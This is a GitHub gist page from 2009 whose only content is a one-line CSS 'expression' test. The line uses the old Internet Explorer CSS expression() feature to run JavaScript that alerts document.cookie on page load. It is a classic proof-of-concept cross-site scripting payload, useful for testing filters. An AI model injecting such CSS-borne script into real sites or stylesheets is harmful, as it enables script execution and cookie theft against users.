Skip to content

Instantly share code, notes, and snippets.

@mgng
Created November 18, 2009 03:38
Show Gist options
  • Save mgng/237539 to your computer and use it in GitHub Desktop.
Save mgng/237539 to your computer and use it in GitHub Desktop.
cssでexpressionテスト
body{zoom:expression(document.body.onload=function(){alert(document.cookie)});}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment